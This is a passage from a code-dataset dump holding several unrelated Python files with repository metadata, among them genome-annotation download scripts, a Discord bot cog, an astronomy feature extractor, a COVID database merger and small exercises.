True)\n","repo_name":"roney123/FileSync","sub_path":"rfs.py","file_name":"rfs.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"26343203594","text":"# This is the code to get the annotation files\n# Here, we have a file with a list of annotation accession and .tab files where the download link for each of the files exists.\n\n########################################\n# 0. 
Initials \n########################################\n\nimport urllib\nimport linecache\nimport pickle\nimport re\nimport numpy as np\nimport pandas as pd\nimport subprocess as sp\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom QC_transcriptionComparison_util import Gene, Exon, Annotation, AnnotationClass\n\n# General data folder\ndataFolder = '/Users/marjanfarahbod/Documents/projects/segwayLabeling/data/'\n\ndataSubFolder = 'testBatch105/fromAPI/'\n\ninputFile = dataFolder + dataSubFolder + 'metaInfo.pkl'\nwith open(inputFile, 'rb') as pickledFile:\n annMeta = pickle.load(pickledFile)\n\nsampleFolder_list = list(annMeta.keys())\n\n########################################\n# get the probs.txt files from the old files\n########################################\n\nfileList = list(glob.iglob(dataFolder + dataSubFolder + 'croo_may_16_2022/*.tsv'))\n# get all the .tsv files\n\n\n# from the html files, get the download links and the workflow_id\n\n# the file with list of samples to identifiers\naccession_ID_file = dataFolder + dataSubFolder + 'Jan_segway_runs_Paul - Detailed table.tsv'\n\nidentifier_sample_map = {}\nwith open(accession_ID_file, 'r') as inputFile:\n line = inputFile.readline()\n for line in inputFile:\n fields = line.strip().split()\n identifier_sample_map[fields[0]] = fields[1]\n\n\nc = 0\nfor file in fileList:\n identifier = file.split('.')[-2]\n if identifier in list(identifier_sample_map.keys()):\n accession = identifier_sample_map[identifier]\n downloadFile = dataFolder + dataSubFolder + accession + '/probs.txt'\n\n # open the file and pars the file for the line with the probs.txt\n\n with open(file, 'r') as addressFile:\n for line in addressFile:\n gs_link = line.strip().split('\\t')[1]\n #print(gs_link[-4:])\n if gs_link.endswith('probs.txt'):\n url = line.strip().split('\\t')[2]\n # download the probs file to its folder\n urllib.request.urlretrieve(url, downloadFile)\n c += 1\n print(c)\n print(accession)\n \n\n########################################\n# get the new batch of files \n########################################\n\n# the input folder:\nrunFolder = dataFolder + 'testBatch_May112022/'\n\n# download file folder\nfileList = list(glob.iglob(runFolder + 'croo_may_11_22/*.tsv'))\n\n# Note: these samples are not on the portal yet so they don't have Segway ID, they have the run ID\n\n# make the folders based on the file list:\nrunID_list = []\nid_file_map = {}\nfor file in fileList:\n run_id = file.split('.')[-2]\n runID_list.append(run_id)\n os.mkdir(runFolder + run_id)\n id_file_map[run_id] = file\n\nfile = runFolder + 'runID_list.pkl'\nwith open(file, 'wb') as outputFile:\n pickle.dump(runID_list, outputFile)\n\n\n# for each id in the runID_list, download the files listed in the files from id_file_map[id]\nc = 0\nfor run_id in runID_list:\n\n sampleFolder = runFolder + run_id + '/' # the folder where files are going to be downloaded\n addressesFile = id_file_map[run_id] # the .tab file with addresses of files to be downloaded\n\n # going to the .tab file with addresses of all files\n with open(addressesFile, 'r') as inputFile:\n #line = inputFile.readline() # the first line is genome data, we don't want that\n print(inputFile)\n print(c)\n c += 1\n downloadFolder = sampleFolder\n \n # make segtools folder\n os.mkdir(downloadFolder + 'call-segtools')\n segtoolsFolder = downloadFolder + 'call-segtools/'\n \n # make interpretation folder\n os.mkdir(downloadFolder + 'call-interpretation')\n interpretationFolder = downloadFolder + 'call-interpretation/'\n\n # 
make segway folder\n os.mkdir(downloadFolder + 'call-segway')\n segwayFolder = downloadFolder + 'call-segway/'\n\n for line in inputFile:\n download_url = line.split('\\t')[2]\n fileName = line.split('\\t')[1]\n\n downloadFolder = sampleFolder\n\n if 'genomedata' in fileName:\n print('gdata - skipping')\n continue\n \n if 'call-segway' in fileName:\n downloadFolder = segwayFolder\n \n if 'call-segtools' in fileName:\n downloadFolder = segtoolsFolder\n\n if 'call-interpretation' in fileName:\n downloadFolder = interpretationFolder\n\n downloadFileName = fileName.split('/')[-1]\n \n downloadFile = downloadFolder + downloadFileName\n print(downloadFile)\n \n urllib.request.urlretrieve(download_url, downloadFile)\n\n print('done download')\n\n\n\n\n","repo_name":"marjanfarahbod/SegwayClustering","sub_path":"annotation_fileDownload.py","file_name":"annotation_fileDownload.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40299440074","text":"from django.db import models\n\n# NOC modules\nfrom noc.core.migration.base import BaseMigration\n\n\nclass Migration(BaseMigration):\n def migrate(self):\n self.db.add_column(\n \"fm_eventclassificationrule\",\n \"drop_event\",\n models.BooleanField(\"Drop Event\", default=False),\n )\n","repo_name":"nocproject/noc","sub_path":"fm/migrations/0006_rule_drop_event.py","file_name":"0006_rule_drop_event.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"51"} +{"seq_id":"21263703445","text":"import sys\n\ndef readvalues(filename):\n \"\"\"reads input configuration from filename\"\"\"\n file = open(filename,\"r\")\n res = []\n i = 3\n for line in file:\n \n if i%4 == 0:\n x = line[:-1].split(\"m\")\n i = 1\n sys.stdout.write(x[1][:-1] + \",\")\n else:\n i += 1\n\nreadvalues(sys.argv[1])","repo_name":"lidiamcfreitas/ASA","sub_path":"tests/readTime.py","file_name":"readTime.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34962541820","text":"import discord\nfrom discord.ext import commands \nimport random\n\n\n# ==== Cog ====\nclass Fun(commands.Cog):\n # ==== Init ====\n def __init__(self, bot):\n self.bot = bot\n\n\n # ==== Commands ====\n @commands.command(name='ratspin',\n help='Uploads an image of a spinning rat or falls back onto pasting a URL',\n brief='SPEEN')\n async def ratspin(self, context):\n # Delete command from user and log\n author = context.message.author\n print(f'- [Fun] !ratspin called by {author}')\n author = str(author).split('#')[0]\n await context.message.delete()\n\n # Try to upload, if that fails, paste URL\n try:\n with open('../assets/rat-spinning.gif', 'rb') as f:\n picture = discord.File(f)\n await context.send(f'{author} says: SPEEN', file=picture)\n except:\n image_url = \"https://media.tenor.com/aaEMtGfZFbkAAAAi/rat-spinning.gif'\"\n await context.send(image_url)\n\n\n @commands.command(name='ratcum',\n hidden=True,\n brief='What will you get??')\n async def ratcum(self, context):\n # Delete command from user and log\n author = context.message.author\n print(f'- [Fun] !ratcum called by {author}')\n author = str(author).split('#')[0]\n await context.message.delete()\n\n # Try to upload, if that fails, paste URL\n try:\n rand_int = random.randint(0, 100)\n if rand_int <= 50:\n with open('../assets/Top_Rat.jpg', 'rb') as f:\n picture = 
discord.File(f)\n picture.filename = f'SPOILER_{picture.filename}'\n await context.send(f'{author} says: ~uuhhnnh~', file=picture)\n if rand_int > 50 and rand_int <= 99:\n with open('../assets/Bottom_Rat.jpg', 'rb') as f:\n picture = discord.File(f)\n picture.filename = f'SPOILER_{picture.filename}'\n await context.send(f'{author} says: ~uuhhnnh~', file=picture)\n if rand_int == 100:\n with open('../assets/Chad_Rat.jpg', 'rb') as f:\n picture = discord.File(f)\n picture.filename = f'SPOILER_{picture.filename}'\n await context.send(f'{author} **ROLLED A RARE RAT!**', file=picture)\n\n except:\n await context.send('Error: Rat could not finish')\n\n\n# ==== Setup ====\nasync def setup(bot):\n await bot.add_cog(Fun(bot))","repo_name":"gooop/Systematic-Rat","sub_path":"src/cogs/Fun.py","file_name":"Fun.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34424038794","text":"import argparse\nimport numpy as np\nfrom astropy.io import fits\n\ndef extract_3fgl(data_path, out_path):\n '''Extract the features from the 3fgl dataset'''\n # Open the fits file\n hdul = fits.open(data_path)\n\n # Extract the AGNs and the pulsars\n classes = hdul[1].data['CLASS1']\n agn_classes = ['psr ', 'agn ', 'FSRQ ', 'fsrq ', 'BLL ', 'bll ', 'BCU ', 'bcu ', 'RDG ', 'rdg ', 'NLSY1', 'nlsy1', 'ssrq ', 'sey ']\n pulsar_classes = ['PSR ', 'psr ']\n agn_mask = np.isin(classes, agn_classes)\n pulsar_mask = np.isin(classes, pulsar_classes)\n\n # Some columns in the 3fgl dataset have bad data\n bad_data_mask = hdul[1].data['Signif_Curve'] == 0.0\n agn_mask = agn_mask & ~bad_data_mask\n pulsar_mask = pulsar_mask & ~bad_data_mask\n\n # Combine the AGNs and pulsars\n data = hdul[1].data[agn_mask | pulsar_mask]\n\n # Extract the 11 features we need for 3fgl\n # The easy ones\n glat = data['GLAT']\n glon = data['GLON']\n ln_energy_flux100 = np.log(data['Energy_Flux100'])\n ln_unc_energy_flux100 = np.log(data['Unc_Energy_Flux100'])\n ln_signif_curve = np.log(data['Signif_Curve'])\n ln_var_index = np.log(data['Variability_Index'])\n\n # Hardness ratios\n ef1 = data['Flux100_300']\n ef2 = data['Flux300_1000']\n ef3 = data['Flux1000_3000']\n ef4 = data['Flux3000_10000']\n ef5 = data['Flux10000_100000']\n hr12 = (ef2 - ef1) / (ef2 + ef1)\n hr23 = (ef3 - ef2) / (ef3 + ef2)\n hr34 = (ef4 - ef3) / (ef4 + ef3)\n hr45 = (ef5 - ef4) / (ef5 + ef4)\n\n # 500 MeV index\n alpha = data['Spectral_Index']\n beta = data['beta']\n gamma = data['Spectral_Index']\n b = data['Exp_Index']\n E_c = data['Cutoff'] # In MeV\n E_0 = data['Pivot_Energy'] # In MeV\n mev_500_index = np.zeros(data.shape)\n for i, point in enumerate(data):\n if point['SpectrumType'] in ['PowerLaw', 'PLExpCutoff', 'PLSuperExpCutoff']:\n if b[i] == float('-inf'):\n b[i] = 1\n mev_500_index[i] = gamma[i] + b[i] * (500 / E_c[i])**b[i]\n else:\n mev_500_index[i] = alpha[i] + 2*beta[i] * np.log(500 / E_0[i])\n\n in_data = np.vstack((glat, glon, ln_energy_flux100, ln_unc_energy_flux100, ln_signif_curve, ln_var_index, hr12, hr23, hr34, hr45, mev_500_index))\n out_data = np.isin(data['CLASS1'], agn_classes).astype(int)\n\n # Save Data\n np.savez_compressed(out_path, in_data=in_data.T, out_data=out_data)\n\ndef extract_4fgl(data_path, out_path):\n '''Extract the features from the 4fgl dataset'''\n # Open the fits file\n hdul = fits.open(data_path)\n\n # Extract the AGNs and the pulsars\n classes = hdul[1].data['CLASS1']\n agn_classes = ['psr ', 'agn ', 'FSRQ ', 'fsrq ', 'BLL ', 'bll ', 
'BCU ', 'bcu ', 'RDG ', 'rdg ', 'NLSY1', 'nlsy1', 'ssrq ', 'sey ']\n pulsar_classes = ['PSR ', 'psr ']\n agn_mask = np.isin(classes, agn_classes)\n pulsar_mask = np.isin(classes, pulsar_classes)\n\n # Some columns in the 4fgl dataset have bad data\n bad_data_mask = np.isnan(hdul[1].data['Unc_LP_Index']) | np.isnan(hdul[1].data['LP_Index']) | np.isnan(hdul[1].data['LP_beta'])\n agn_mask = agn_mask & ~bad_data_mask\n pulsar_mask = pulsar_mask & ~bad_data_mask\n\n # Combine the AGNs and pulsars\n data = hdul[1].data[agn_mask | pulsar_mask]\n\n # Extract the 16 features we need for 4fgl (minus the 6 Hardess Ratios, not in the dataset)\n glat = data['GLAT']\n glon = data['GLON']\n ln_pivot_energy = np.log(data['Pivot_Energy'])\n unc_lp_index = data['Unc_LP_Index']\n lp_index = data['LP_Index']\n lp_beta = data['LP_beta']\n lp_sincurv = data['LP_SigCurv']\n ln_energy_flux100 = np.log(data['Energy_Flux100'])\n ln_unc_energy_flux100 = np.log(data['Unc_Energy_Flux100'])\n ln_var_index = np.log(data['Variability_Index'])\n\n in_data = np.vstack((glat, glon, ln_energy_flux100, ln_unc_energy_flux100, ln_var_index, ln_pivot_energy, lp_index, unc_lp_index, lp_beta, lp_sincurv))\n out_data = np.isin(data['CLASS1'], agn_classes).astype(int)\n \n # Save Data\n np.savez_compressed(out_path, in_data=in_data.T, out_data=out_data)\n\nif __name__ == '__main__':\n #python3 data_extr.py --data3fgl data/gll_psc_v16.fit --data4fgl data/gll_psc_v27.fit --outfile3fgl data/3fgl --outfile4fgl data/4fgl\n parser = argparse.ArgumentParser(description='Duplicates pulsars in dataset to even out number of AGNs and pulsars for oversampling')\n parser.add_argument('--data3fgl', help='A file/path containing input data')\n parser.add_argument('--data4fgl', help='A file/path containing input data')\n parser.add_argument('--outfile3fgl', help='Desired name of output file (include file path if needed, ex. data/3fgl)')\n parser.add_argument('--outfile4fgl', help='Desired name of output file (include file path if needed, ex. 
data/4fgl)')\n \n args = parser.parse_args()\n\n extract_3fgl(args.data3fgl, args.outfile3fgl)\n extract_4fgl(args.data4fgl, args.outfile4fgl)\n\n\n print(\"Extraction complete\")","repo_name":"PaulVirally/PHYS-449-Group-4-Project","sub_path":"data_extr.py","file_name":"data_extr.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"32572049107","text":"from pathlib import Path\n\nfrom langworld_db_data.constants.paths import (\n FEATURE_PROFILES_DIR,\n FILE_WITH_LISTED_VALUES,\n FILE_WITH_NAMES_OF_FEATURES,\n DISCUSSION_FILE_WITH_LISTED_VALUES,\n)\nfrom langworld_db_data.mdlisters.abstract_value_lister import AbstractValueLister\nfrom langworld_db_data.filetools.csv_xls import read_csv, read_dict_from_2_csv_columns\n\n\nclass ListedValueLister(AbstractValueLister):\n def __init__(\n self,\n dir_with_feature_profiles: Path = FEATURE_PROFILES_DIR,\n file_with_listed_values: Path = FILE_WITH_LISTED_VALUES,\n ):\n super().__init__(value_type='listed', dir_with_feature_profiles=dir_with_feature_profiles)\n self.file_with_listed_values = file_with_listed_values\n \n def write_grouped_by_feature(\n self, output_file: Path = DISCUSSION_FILE_WITH_LISTED_VALUES\n ):\n\n feature_ids = [\n row['id'] for row in\n read_csv(FILE_WITH_NAMES_OF_FEATURES, read_as='dicts')\n ]\n\n rows_with_listed_values = read_csv(self.file_with_listed_values, read_as='dicts')\n\n feature_to_value_to_doculects = {\n feature_id: {\n row['id']: [] for row in rows_with_listed_values if row['feature_id'] == feature_id\n }\n for feature_id in feature_ids\n }\n\n for volume_and_doculect_id in self.filtered_rows_for_volume_doculect_id:\n for row in self.filtered_rows_for_volume_doculect_id[volume_and_doculect_id]:\n feature_to_value_to_doculects[row['feature_id']][row['value_id']].append(volume_and_doculect_id)\n\n feature_name_for_feature_id = read_dict_from_2_csv_columns(\n FILE_WITH_NAMES_OF_FEATURES,\n key_col='id',\n val_col='ru',\n )\n\n value_name_for_value_id = read_dict_from_2_csv_columns(\n self.file_with_listed_values,\n key_col='id',\n val_col='ru'\n )\n\n content = (\n f'# Значения типа `{self.value_type}`\\n'\n 'Оглавление файла открывается кнопкой сверху слева рядом с индикатором количества строк.'\n )\n\n for feature_id in feature_name_for_feature_id:\n content += f'\\n\\n## {feature_id} — {feature_name_for_feature_id[feature_id]}\\n'\n\n for value_id in feature_to_value_to_doculects[feature_id]:\n content += f'\\n- **{value_name_for_value_id[value_id]}** ({value_id}): ' \\\n f'кол-во языков — **{len(feature_to_value_to_doculects[feature_id][value_id])}**'\n\n # # This is good but leads to a very large file being generated. 
GitHub refuses to show its content.\n # if not feature_to_value_to_doculects[feature_id][value_id]:\n # content += '_Нет языков_'\n #\n # else:\n # for volume_and_doculect_id in feature_to_value_to_doculects[feature_id][value_id]:\n # volume, doculect_id = volume_and_doculect_id.split(':')\n # content += (\n # f'[{self.doculect_ru_for_doculect_id[doculect_id]}]'\n # f'(../feature_profiles/{doculect_id}.csv){volume}, '\n # )\n # content = content[:-2] # removing last ', '\n\n # print(content)\n\n with output_file.open(mode='w+', encoding='utf-8') as fh:\n fh.write(content)\n\n def write_grouped_by_volume_and_doculect(\n self, output_file: Path\n ):\n pass\n\n\nif __name__ == '__main__':\n lister = ListedValueLister()\n lister.write_grouped_by_feature()\n","repo_name":"Antaresselen87/langworld_db_data","sub_path":"langworld_db_data/mdlisters/listed_value_lister.py","file_name":"listed_value_lister.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"74775745117","text":"\r\nclass User:\r\n name = \"default\"\r\n player_choice = 'Stone'\r\n def __init__(self, name, player_choices):\r\n self.name = name\r\n self.player_choice = player_choices\r\n\r\n def set(self, name):\r\n self.name = name\r\n \r\ndef WhoWin(fPlayer, sPlayer):\r\n if fPlayer.player_choice == sPlayer.player_choice:\r\n print(\"draw\")\r\n print(fPlayer.player_choice, \" \", sPlayer.player_choice)\r\n else:\r\n list = []\r\n list.append(fPlayer.player_choice)\r\n list.append(sPlayer.player_choice)\r\n papper = False\r\n stone = False\r\n scissors = False\r\n for l in list:\r\n if l == \"papper\":\r\n papper = True\r\n elif l == \"stone\":\r\n stone = True\r\n elif l == \"scissors\":\r\n scissors = True\r\n if(papper and stone):\r\n if(fPlayer.player_choice == \"papper\"):\r\n print(\"Win: \", fPlayer.name)\r\n else:\r\n print(\"Win: \", sPlayer.name)\r\n elif(papper and scissors):\r\n if(fPlayer.player_choice == \"scissors\"):\r\n print(\"Win: \", fPlayer.name)\r\n else:\r\n print(\"Win: \", sPlayer.name)\r\n elif(scissors and stone):\r\n if(fPlayer.player_choice == \"stone\"):\r\n print(\"Win: \", fPlayer.name)\r\n else:\r\n print(\"Win: \", sPlayer.name) \r\n \r\n ","repo_name":"tysunday/itproger","sub_path":"hw_python/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"37173772928","text":"import pandas as pd\nimport sqlite3\nimport os\nimport csv\n\nCOVID_COLS = [\"CumulativePositive\", \"CumulativeDeceased\", \"CumulativeRecovered\", \"CurrentlyPositive\", \"Hospitalized\", \"IntensiveCare\"]\nPOLICIES_COLS = [\"Curfew\"]\n\nclass Policies(object):\n def __init__(self, file_name):\n self.file_name = file_name\n self.df = self._load_df()\n \n def _load_df(self):\n \"\"\"\n Load and pre-process the policy file\n \"\"\"\n return pd.read_csv(self.file_name)\n \n def extract_policy_from_iso_a2_code(self, nuts2_code, iso_a2_code):\n \"\"\"\n Extract the policy from an ISO-A2 code\n \"\"\"\n out_df = self.df[self.df[\"province\"] == iso_a2_code][[\"date\"] + POLICIES_COLS]\n out_df[\"NUTS\"] = nuts2_code\n return out_df\n \nclass CovidCases(object):\n def __init__(self, covid_file_name, datasetMerger):\n self.covid_file_name = covid_file_name\n self.datasetMerger = datasetMerger\n self.df = self._load_df()\n \n def _load_df(self):\n \"\"\"\n Load and pre-process the file with Covid cases\n \"\"\"\n df = 
pd.read_csv(self.covid_file_name)\n df[COVID_COLS] = df[COVID_COLS].fillna(0)\n return df\n \n def _find_children_from_nuts_2(self, nuts2_code, dataset_merger):\n \"\"\"\n From a nuts2_code, get all the children nuts3 codes\n params:\n nuts2_code: str\n \n return:\n list (str)\n \"\"\"\n return dataset_merger.db_df[self.datasetMerger.db_df[\"NUTS\"] == nuts2_code][\"Covid (NUTS)\"].to_list()\n \n def _aggregate_from_nuts_2(self, nuts2_code, dataset_merger):\n \"\"\"\n Sum all covid cases from a nuts2_code aggregation\n params:\n nuts2_code: str\n return:\n DataFrame\n \"\"\"\n \n # Call _find_children_from_nuts_2(self, nuts2_code)\n \n # Sum all\n covid_keys = self._find_children_from_nuts_2(nuts2_code, dataset_merger)\n return self.df[self.df[\"NUTS\"].isin(covid_keys)].groupby([\"Date\"])[COVID_COLS].sum().reset_index()\n \n def get_covid_cases(self, covid_code, nuts2_code, dataset_merger):\n \"\"\"\n Get all covid cases\n params:\n covid_code: str\n nuts2_code: str \n \"\"\"\n \n # If covid_code == nuts2_code, then just extract data from covid_code\n # Else, call _aggregate_from_nuts_2 \n out_df = None\n if covid_code == nuts2_code:\n out_df = self.df[self.df[\"NUTS\"] == nuts2_code][[\"Date\"] + COVID_COLS]\n else:\n #print(\"aaaaaaa: \", covid_code, \" \", nuts2_code )\n out_df = self._aggregate_from_nuts_2(nuts2_code, dataset_merger)\n \n out_df[\"NUTS\"] = nuts2_code\n return out_df\n \n \nclass Covariate(object):\n def __init__(self, file_path, file_type='xlsx', aggregation_method='sum'):\n \"\"\"\n Covariate file\n params: \n file_name: str\n file_type: str\n among 'xlsx', 'tsv', 'csv'\n aggregation_method: str\n among 'sum', 'popsum', 'avg'\n \"\"\"\n self.file_path = file_path\n self.file_type = file_type\n self.aggregation_method = aggregation_method\n \n self.col_name = '.'.join([file_path, aggregation_method])\n \n self.df = self._load_df()\n \n \n def _load_df(self):\n \"\"\"\n Load the covariate data\n \n :return\n DataFrame\n \"\"\"\n \n df = None\n # Check the file type and load from the according file type\n if self.file_type == \"xlsx\":\n df = self._load_excel()\n elif self.file_type == \"csv\":\n df = self._load_csv()\n elif self.file_type == \"tsv\":\n df = self._load_tsv()\n \n return self._compute_covariate_value(df)\n \n \n def _load_excel(self):\n \"\"\"\n Load from an .xlsx file\n \n :return\n DataFrame\n \"\"\"\n return pd.read_excel(self.file_path)\n \n def _load_csv(self):\n \"\"\"\n Read from an .csv file\n \n :return\n DataFrame\n \"\"\"\n return pd.read_csv(self.file_path)\n \n def _load_tsv(self):\n \"\"\"\n Read from an .tsv file\n \n :return\n DataFrame\n \"\"\"\n return pd.read_csv(self.file_path, sep='\\t') \n \n @staticmethod\n def _compute_covariate_value(df):\n \"\"\"\n Compute the covariate value by coalescing the columns from right-most to left-most\n \n :return\n DataFrame\n \"\"\"\n return df.assign(\n covariate_value=pd.to_numeric(df.iloc[:, ::-1].notnull().idxmax(1).pipe(\n lambda d: df.lookup(d.index, d.values)\n ), errors='coerce')\n )\n \n def extract_covariate(self, nuts_codes):\n \"\"\"\n Extract the covariate value for given nuts_codes and a specified aggregartion method\n \n params:\n nuts_codes: list (str)\n \n return:\n DataFrame\n \"\"\"\n \n if len(nuts_codes) > 1:\n return self.df[self.df.iloc[:, 0].isin(nuts_codes)][\"covariate_value\"].aggregate(self.aggregation_method)\n else:\n return self.df[self.df.iloc[:, 0] == nuts_codes[0]][\"covariate_value\"].values[0]\n\n \n \nclass DatasetsMerger(object):\n \n def __init__(self, 
db_filename, covid_file_name, eurostat_folder, policy_file_name, db_folder='./', db_sheet=3):\n        \"\"\"\n        DatasetsMerger\n        \n        params:\n            db_filename: str\n            db_folder: str\n        \"\"\"\n        self.db_filename = db_filename\n        self.covid_file_name = covid_file_name \n        self.eurostat_folder = eurostat_folder\n        self.policy_file_name = policy_file_name\n        self.db_folder = db_folder\n        self.db_sheet = db_sheet\n        \n        \n        self.db_df = self._load_db_df()\n        print(self.db_df.columns[:25])\n        self.covariates = self._load_covariates()\n        self.covid_cases = self._load_covid_cases()\n        self.policies = self._load_policies()\n        \n        self._raw_data = {}\n        \n        \n        \n        \n    def _load_db_df(self):\n        \"\"\"\n        Load the DBFinale\n        \n        returns:\n            DataFrame\n        \"\"\"\n        return pd.read_excel(self.db_filename, sheet_name = self.db_sheet)\n        #return pd.read_csv(self.db_file_name, sep=\"\\t\")\n    def _load_covariates(self):\n        \"\"\"\n        Load all the covariates from the db_df\n        \n        return:\n            list (Covariate)\n        \"\"\"\n        \n        # Return a map of {col_name_cov_1: Covariate(), col_name_cov_2: Covariate(), ...}\n        covs = {}\n        #\"\"\"\n        for covariate_info in list(self.db_df.columns.values)[8:]:\n            if \"inserire nome covariate\" in covariate_info:\n                continue\n            \n            try:\n                cov_file_name = covariate_info.split(\".\")[0]\n                cov_file_type = covariate_info.split(\".\")[1]\n                cov_agg_method = covariate_info.split(\".\")[2]\n                \n                cov_file_path = os.path.join(self.eurostat_folder, cov_file_name + '.' + cov_file_type) \n                covs[covariate_info] = Covariate(cov_file_path, file_type=cov_file_type, aggregation_method=cov_agg_method)\n            except Exception as e:\n                print(covariate_info, \" \",e)\n                pass\n        \"\"\" \n        with open(self.db_filename) as fd:\n            reader = csv.reader(fd, delimiter=\"\\t\", quotechar='\"')\n            for line in fd:\n                print(line)\n            next(reader, None) # skip the headers\n            for row in reader:\n                print(row)\n                cov_file_name = row[0]\n                \n                cov_name = row[0].split(\".\")[0]\n                cov_file_type = row[0].split(\".\")[-1]\n                cov_agg_method = row[-1]\n                \n                cov_file_path = os.path.join(self.eurostat_folder, cov_file_name) \n                covs[cov_name] = Covariate(cov_file_path, file_type=cov_file_type, aggregation_method=cov_agg_method)\n        \"\"\"\n        return covs\n    \n    \n    \n    def _load_covid_cases(self):\n        \"\"\"\n        Load Covid Cases\n        \n        return:\n            CovidCases\n        \"\"\"\n        \n        # Return CovidCases\n        return CovidCases(self.covid_file_name, self)\n    \n    \n    def _load_policies(self):\n        \"\"\"\n        Load Policies\n        \n        return:\n            Policies\n        \"\"\"\n        \n        # Return Policies\n        return Policies(self.policy_file_name)\n    \n    \n    def merge(self):\n        \"\"\"\n        Merge the dataset\n        \n        return:\n            SQLite database\n        \"\"\"\n        all_policies = []\n        all_cov_values = []\n        all_covid_cases = []\n        \n        _already_seen_nuts = []\n        \n        # Loop over all the rows\n        for index, r in self.db_df.iterrows():\n            \n            if r[\"NUTS\"] in _already_seen_nuts:\n                continue\n            _already_seen_nuts.append(r[\"NUTS\"])\n            \n            covid_infos = self.covid_cases.get_covid_cases(r[\"Covid (NUTS)\"], r[\"NUTS\"], self)\n            policies = self.policies.extract_policy_from_iso_a2_code(r[\"NUTS\"], r[\"ISO_A2 (FOR NATIONAL POLICIES)\"])\n            \n            all_policies.append(policies)\n            all_covid_cases.append(covid_infos)\n            \n            for cov_col_name, cov in self.covariates.items():\n                try:\n                    nuts_codes = list(map(lambda e: e.strip(), r[cov_col_name].split('/')))\n                    cov_value = cov.extract_covariate(nuts_codes)\n                    all_cov_values.append([r['Key'], cov_col_name.split(\".\")[0], cov_value])\n                except Exception:\n                    all_cov_values.append([r['Key'], cov_col_name.split(\".\")[0], None])\n        \n        self._raw_data[\"policies\"] = all_policies\n        self._raw_data[\"covariates\"] = all_cov_values\n        self._raw_data[\"covid\"] = all_covid_cases\n        \n        \n    def save_to_sqlite(self):\n        \"\"\"\n        Save the data to SQLite format\n        \"\"\"\n        \n        to_store_covid = pd.concat(self._raw_data[\"covid\"])\n        to_store_covariates = pd.DataFrame(self._raw_data[\"covariates\"], columns=[\"NUTS\", \"Covariate\", \"Value\"])\n        to_store_policies = pd.concat(self._raw_data[\"policies\"])\n        \n        output_db_file_path = os.path.join(self.db_folder,\"covid_at_lombardy.sqlite\")\n        conn = sqlite3.connect(output_db_file_path)\n        to_store_covid.to_sql('covid_cases', conn, if_exists='replace', index=False)\n        to_store_covariates.to_sql('covariates', conn, if_exists='replace', index=False)\n        to_store_policies.to_sql('policies', conn, if_exists='replace', index=False)\n        \n        \n        \n\n    \n    ","repo_name":"Chris1nexus/covid-eu-analysis","sub_path":"database/db_gen_lib/db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":11402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"22075249546","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n        import sys\n        dummy = ListNode(-sys.maxsize)\n        pre = None\n        pre = dummy\n        while (l1 and l2):\n            if l1.val <= l2.val:\n                pre.next, pre, l1 = l1, l1, l1.next\n            else:\n                pre.next, pre, l2 = l2, l2, l2.next\n        if not l1:\n            pre.next = l2\n        elif not l2:\n            pre.next = l1\n        return dummy.next\n\n\n\n# remember to create a dummy node which could reduce the complexity of such problems\n","repo_name":"JerryZhuzq/leetcode","sub_path":"linked list/21. 
Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35306036073","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom unittest.mock import patch, mock_open\nfrom lib import utils\nimport unittest\nimport pandas as pd\nimport collections\n\n\nclass UtilsTestCase(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_read_save(self):\n\n with patch(\"builtins.open\", mock_open(read_data=\"data\")) as mock_file:\n\n file_input = utils.read_save(mock_file)\n self.assertTrue(file_input == \"data\")\n\n def test_fill_parameters(self):\n\n out_parameters = utils.fill_parameters(parameter_raw=dict())\n self.assertTrue(set(out_parameters.keys()) == {\"scope\", \"num_words\", \"file_ending\", \"folder\",\n \"windowsize\", \"ratio\", \"maxlen\", \"gram_size\", \"chunk_size\", \"lang\",\n \"categorical_scope\", \"chunk_scope\", \"sequence_scope\"})\n\n def test_context_grabber(self):\n\n context = utils.context_grabber([\"a\", \"b\", \"c\"], 3)\n self.assertTrue(context == ['padder padder padder a b c padder',\n 'padder padder a b c padder padder',\n 'padder a b c padder padder padder'])\n\n def test_TrainingData_init(self):\n\n test_object = utils.TrainingData(num_words=100, file_ending=\".test\", folder=\"foo/bar\", windowsize=0,\n ratio=0.1, maxlen=0, chunk_size=0, gram_size=0, lang=\"de\", chunk_scope=\"scope\", sequence_scope=\"scope\",\n categorical_scope=\"scope\")\n\n self.assertTrue(test_object.categorical_scope == \"scope\" and\n test_object.chunk_scope == \"scope\" and\n test_object.sequence_scope == \"scope\" and\n test_object.num_words == 100 and\n test_object.file_ending == \".test\" and\n test_object.folder == \"foo/bar\" and\n test_object.windowsize == 0 and\n test_object.ratio == 0.1 and\n test_object.maxlen == 0 and\n test_object.chunk_size == 0 and\n test_object.gram_size == 0 and\n test_object.lang == \"de\" and\n test_object.X == None and\n test_object.Y == None 